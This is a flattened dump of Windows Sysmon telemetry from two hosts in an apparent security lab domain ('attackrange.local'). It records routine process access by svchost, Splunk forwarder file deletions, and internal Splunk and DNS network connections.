12:26:03.289{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441700Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:03.289{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441705Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:04.586{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58F22B8A4AD2B48E16D34CE108D62D17,SHA256=9DD32BA24A5E2A73DF86D53A64AB62100F7E4DD6C4D8757EB4C9CE52EAA6428E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293325Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:04.272{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=774C7C0683C2EFBAF3835A8A74114B1B,SHA256=A7E75D1F24D0655F296782C73A8F6A8241B0B9A4BD4E3CC4308BB308A2C80B71,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441704Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:04.290{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441703Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:04.290{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441708Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:05.623{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AB784453B859CD78573E660B94823C7,SHA256=551036B722883BA808922A86546F206DD99691DFD7119B91BF878794784BDB78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293326Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:05.287{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=850448307D79FBF9A4C42F339EEFC95C,SHA256=31A341CBF48836394741AB80470D4FEE679256FA98148B0A141212EB03ADACF9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441707Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:05.291{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441706Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:05.291{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441711Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:06.644{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E924B4296260D282B823379880237728,SHA256=2A1DC47083ED07CFEBF8A1CB0253455F1D28C3B948077C0A9D5B0160FFFF3856,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293330Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:04.498{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50668-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000293329Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:06.319{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4502F3D471EF9DA1D96120CB1FF03FF,SHA256=92C6FE5D3521621E54391319649B57E2D43D6B8CD879AC02CA060AFA3C0107FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441710Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:06.292{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441709Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:06.292{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293328Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:06.220{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DBE5679BF4A8C7B307240D346C29A9E,SHA256=B2D12C57EB570442D263E0F883FC88A856EBAB7357CED9C964E63809F6DA9670,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293327Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:06.219{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=44C097B5B0291F1A153CCF8B36DA82BD,SHA256=979EDE62CB33AA39D0B3767CA2173B384D5486ADAED8D57AF33DF3FF92780071,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441717Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:07.872{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=232872668D935C20357A4F08837A7D94,SHA256=2FF9407A1D5DAB3665579CD3BE3CA8A4B8F99B58645D91EF86E4DBF0E6E86327,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293332Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:07.338{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE2B20957433623E6843EED49BA6E350,SHA256=5B5E930BDE6F897DCAD1D5F49244256DE6DBE5AD49DA0E0C359EE76400D6F10D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441716Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:07.292{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441715Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:07.292{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000441714Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:04.540{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62437-false10.0.1.12-8000- 23542300x8000000000000000441713Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:07.094{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAD3053CA50281B811DB19F78EC51186,SHA256=29235A4288FEEBAE7AB38C31104A9F23EE18DEBB418EA4CDDA22C1F80E82DC17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441712Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:07.093{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADACEB28FDD4AA94FA509C25C444F4C0,SHA256=F18D5AE85BE688E08F79E7398BF56E585A3E29B1820FA21603087AED9A610D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293331Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:07.185{BEA10069-D13E-6086-9900-00000000BB01}408NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=1385DDF0A626EB1FF1FAEF0A6E1E1E19,SHA256=D3A04D6A86810FFAE54532D83A4C2D8246C33C9E5E1AB8193B89366C377D56F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441721Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:08.877{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30FA611C90BE60330903532F32187E17,SHA256=5B4BE1CAF4B779E958FF3B54FFB88A7BF03C0060C160B9CCCC706E8E65140A0A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293335Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:06.466{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50669-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000293334Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:08.370{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D1BA4C91FA14B56DCC320640700FA85,SHA256=6DF85535249ECB3FAA63B2977985265B748F8FDBA1CBAB60B85138C45B0AB894,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441720Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:08.293{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441719Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:08.293{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000441718Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:05.473{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local53340- 23542300x8000000000000000293333Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:08.185{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DBE5679BF4A8C7B307240D346C29A9E,SHA256=B2D12C57EB570442D263E0F883FC88A856EBAB7357CED9C964E63809F6DA9670,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293336Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:26:09.421{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D7CF3738F976A55D38B229B7891A8F2,SHA256=E651A675D9C970ACFB024FDAC132F71F8A80BD92B694687796CE3672F18FB67C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441723Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:09.294{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441722Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:26:09.294{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781